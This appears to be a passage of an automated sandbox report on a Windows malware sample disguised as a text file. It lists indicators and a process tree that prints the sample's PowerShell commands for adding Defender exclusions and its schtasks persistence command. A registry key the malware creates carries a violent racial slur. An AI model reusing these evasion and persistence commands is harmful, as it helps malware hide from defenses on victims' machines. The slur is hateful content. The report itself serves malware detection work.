Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0100	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	powercfg.exe

Delays execution with timeout.exe 4 IoCs

pid	Process
6840	timeout.exe
8016	timeout.exe
1600	timeout.exe
4496	timeout.exe

Enumerates system info in registry 2 TTPs 21 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Process not Found

Kills process with taskkill 38 IoCs

pid	Process
5116	taskkill.exe
2184	taskkill.exe
3724	taskkill.exe
2444	taskkill.exe
5932	taskkill.exe
4576	taskkill.exe
5084	taskkill.exe
5188	taskkill.exe
5952	taskkill.exe
3908	taskkill.exe
6020	taskkill.exe
2144	taskkill.exe
1236	taskkill.exe
5800	taskkill.exe
5776	taskkill.exe
2560	taskkill.exe
1728	taskkill.exe
3644	taskkill.exe
4708	taskkill.exe
2836	taskkill.exe
3096	taskkill.exe
5408	taskkill.exe
5060	taskkill.exe
300	taskkill.exe
3652	taskkill.exe
2004	taskkill.exe
404	taskkill.exe
1504	taskkill.exe
4644	taskkill.exe
3488	taskkill.exe
5548	taskkill.exe
5344	taskkill.exe
700	taskkill.exe
2392	taskkill.exe
6004	taskkill.exe
6088	taskkill.exe
3908	taskkill.exe
5204	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes	reg.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Software	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	reg.exe

Modifies registry class 26 IoCs

description	ioc	Process
Key created	\Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\Registry\User\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3920535620-1286624088-2946613906-1000\{C26CCE22-0619-4399-BCED-FEDD06CA68D2}	Process not Found

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2476	schtasks.exe
5220	schtasks.exe
2336	schtasks.exe
7424	schtasks.exe
808	schtasks.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
2392	powershell.exe
2400	powershell.exe
2392	powershell.exe
2400	powershell.exe
6128	powershell.exe
6128	powershell.exe
3776	powershell.exe
3776	powershell.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
5516	powershell.exe
5516	powershell.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
948	sRasauq SoftWorks.exe
5484	powershell.exe
5484	powershell.exe
4632	powershell.exe
4632	powershell.exe
6076	powershell.exe
6076	powershell.exe
4608	powershell.exe
4608	powershell.exe
1612	powershell.exe
1612	powershell.exe
4392	powershell.exe
4392	powershell.exe
4936	powershell.exe
4936	powershell.exe
4928	powershell.exe
4928	powershell.exe
4360	powershell.exe
4360	powershell.exe
6032	powershell.exe
6032	powershell.exe
4560	powershell.exe
4560	powershell.exe
4176	powershell.exe
4176	powershell.exe
4176	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
1232	msedge.exe
2288	cmd.exe
4792	cmd.exe
10160	Process not Found
8700	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe
1232	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5888	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	5204	taskkill.exe
Token: SeDebugPrivilege	6128	powershell.exe
Token: SeDebugPrivilege	3776	powershell.exe
Token: SeBackupPrivilege	5176	vssvc.exe
Token: SeRestorePrivilege	5176	vssvc.exe
Token: SeAuditPrivilege	5176	vssvc.exe
Token: SeDebugPrivilege	948	sRasauq SoftWorks.exe
Token: SeDebugPrivilege	3488	taskkill.exe
Token: SeDebugPrivilege	5516	powershell.exe
Token: SeDebugPrivilege	5484	powershell.exe
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	5188	taskkill.exe
Token: SeDebugPrivilege	6076	powershell.exe
Token: SeDebugPrivilege	5408	taskkill.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe
Token: SeDebugPrivilege	4936	powershell.exe
Token: SeDebugPrivilege	5888	Rasauq SoftWorks.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	5952	taskkill.exe
Token: SeDebugPrivilege	404	taskkill.exe
Token: SeDebugPrivilege	5548	taskkill.exe
Token: SeDebugPrivilege	5800	taskkill.exe
Token: SeDebugPrivilege	6032	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	1504	taskkill.exe
Token: SeDebugPrivilege	3908	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	3644	taskkill.exe
Token: SeDebugPrivilege	5344	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	5116	taskkill.exe
Token: SeDebugPrivilege	2184	taskkill.exe
Token: SeDebugPrivilege	3724	taskkill.exe
Token: SeDebugPrivilege	5060	taskkill.exe
Token: SeDebugPrivilege	5776	taskkill.exe
Token: SeDebugPrivilege	6020	taskkill.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	2144	taskkill.exe
Token: SeDebugPrivilege	1236	taskkill.exe
Token: SeDebugPrivilege	300	taskkill.exe
Token: SeDebugPrivilege	3652	taskkill.exe
Token: SeDebugPrivilege	2444	taskkill.exe
Token: SeDebugPrivilege	4708	taskkill.exe
Token: SeDebugPrivilege	5932	taskkill.exe
Token: SeDebugPrivilege	6004	taskkill.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	2560	taskkill.exe
Token: SeDebugPrivilege	2004	taskkill.exe
Token: SeTakeOwnershipPrivilege	3804	takeown.exe
Token: SeDebugPrivilege	296	Windows Host Service.scr
Token: SeShutdownPrivilege	2400	powercfg.exe
Token: SeCreatePagefilePrivilege	2400	powercfg.exe
Token: SeShutdownPrivilege	5000	powercfg.exe
Token: SeCreatePagefilePrivilege	5000	powercfg.exe
Token: SeShutdownPrivilege	2776	powercfg.exe
Token: SeCreatePagefilePrivilege	2776	powercfg.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2400	powershell.exe
2392	powershell.exe
1232	msedge.exe
1232	msedge.exe
10160	Process not Found
10160	Process not Found
8700	Process not Found
8700	Process not Found
2400	Process not Found
2400	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
6312	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
10188	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found
8220	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 5888	2376	READ ME BEFOR OPEN.txt.exe	78
PID 2376 wrote to memory of 5888	2376	READ ME BEFOR OPEN.txt.exe	78
PID 2376 wrote to memory of 948	2376	READ ME BEFOR OPEN.txt.exe	79
PID 2376 wrote to memory of 948	2376	READ ME BEFOR OPEN.txt.exe	79
PID 2376 wrote to memory of 3584	2376	READ ME BEFOR OPEN.txt.exe	80
PID 2376 wrote to memory of 3584	2376	READ ME BEFOR OPEN.txt.exe	80
PID 3584 wrote to memory of 2432	3584	cmd.exe	82
PID 3584 wrote to memory of 2432	3584	cmd.exe	82
PID 3584 wrote to memory of 4168	3584	cmd.exe	83
PID 3584 wrote to memory of 4168	3584	cmd.exe	83
PID 3584 wrote to memory of 4792	3584	cmd.exe	84
PID 3584 wrote to memory of 4792	3584	cmd.exe	84
PID 3584 wrote to memory of 2288	3584	cmd.exe	85
PID 3584 wrote to memory of 2288	3584	cmd.exe	85
PID 2288 wrote to memory of 3424	2288	cmd.exe	88
PID 2288 wrote to memory of 3424	2288	cmd.exe	88
PID 4792 wrote to memory of 4332	4792	cmd.exe	89
PID 4792 wrote to memory of 4332	4792	cmd.exe	89
PID 2288 wrote to memory of 2392	2288	cmd.exe	90
PID 2288 wrote to memory of 2392	2288	cmd.exe	90
PID 4792 wrote to memory of 2400	4792	cmd.exe	91
PID 4792 wrote to memory of 2400	4792	cmd.exe	91
PID 2288 wrote to memory of 1960	2288	cmd.exe	92
PID 2288 wrote to memory of 1960	2288	cmd.exe	92
PID 4792 wrote to memory of 5064	4792	cmd.exe	93
PID 4792 wrote to memory of 5064	4792	cmd.exe	93
PID 2288 wrote to memory of 5504	2288	cmd.exe	94
PID 2288 wrote to memory of 5504	2288	cmd.exe	94
PID 2288 wrote to memory of 4680	2288	cmd.exe	95
PID 2288 wrote to memory of 4680	2288	cmd.exe	95
PID 2288 wrote to memory of 5672	2288	cmd.exe	96
PID 2288 wrote to memory of 5672	2288	cmd.exe	96
PID 2288 wrote to memory of 4416	2288	cmd.exe	97
PID 2288 wrote to memory of 4416	2288	cmd.exe	97
PID 4792 wrote to memory of 3108	4792	cmd.exe	98
PID 4792 wrote to memory of 3108	4792	cmd.exe	98
PID 2288 wrote to memory of 4424	2288	cmd.exe	99
PID 2288 wrote to memory of 4424	2288	cmd.exe	99
PID 4792 wrote to memory of 5084	4792	cmd.exe	100
PID 4792 wrote to memory of 5084	4792	cmd.exe	100
PID 2288 wrote to memory of 6084	2288	cmd.exe	101
PID 2288 wrote to memory of 6084	2288	cmd.exe	101
PID 2288 wrote to memory of 3448	2288	cmd.exe	102
PID 2288 wrote to memory of 3448	2288	cmd.exe	102
PID 4792 wrote to memory of 5868	4792	cmd.exe	103
PID 4792 wrote to memory of 5868	4792	cmd.exe	103
PID 2288 wrote to memory of 3552	2288	cmd.exe	104
PID 2288 wrote to memory of 3552	2288	cmd.exe	104
PID 4792 wrote to memory of 1084	4792	cmd.exe	105
PID 4792 wrote to memory of 1084	4792	cmd.exe	105
PID 2288 wrote to memory of 5448	2288	cmd.exe	106
PID 2288 wrote to memory of 5448	2288	cmd.exe	106
PID 4792 wrote to memory of 6096	4792	cmd.exe	107
PID 4792 wrote to memory of 6096	4792	cmd.exe	107
PID 2288 wrote to memory of 2876	2288	cmd.exe	108
PID 2288 wrote to memory of 2876	2288	cmd.exe	108
PID 4792 wrote to memory of 2692	4792	cmd.exe	109
PID 4792 wrote to memory of 2692	4792	cmd.exe	109
PID 2288 wrote to memory of 2936	2288	cmd.exe	110
PID 2288 wrote to memory of 2936	2288	cmd.exe	110
PID 4792 wrote to memory of 2184	4792	cmd.exe	111
PID 4792 wrote to memory of 2184	4792	cmd.exe	111
PID 4792 wrote to memory of 3656	4792	cmd.exe	113
PID 4792 wrote to memory of 3656	4792	cmd.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

T1564.001

pid	Process
3540	attrib.exe
4804	attrib.exe

C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe
"C:\Users\Admin\AppData\Local\Temp\READ ME BEFOR OPEN.txt.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2376
- C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  PID:5888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6076
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2336
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /f /tn "Windows Host Service"
    3⤵
    PID:7844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp26C.tmp.bat""
    3⤵
    PID:7900
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:8016
- C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
  "C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- - C:\Windows\System32\attrib.exe
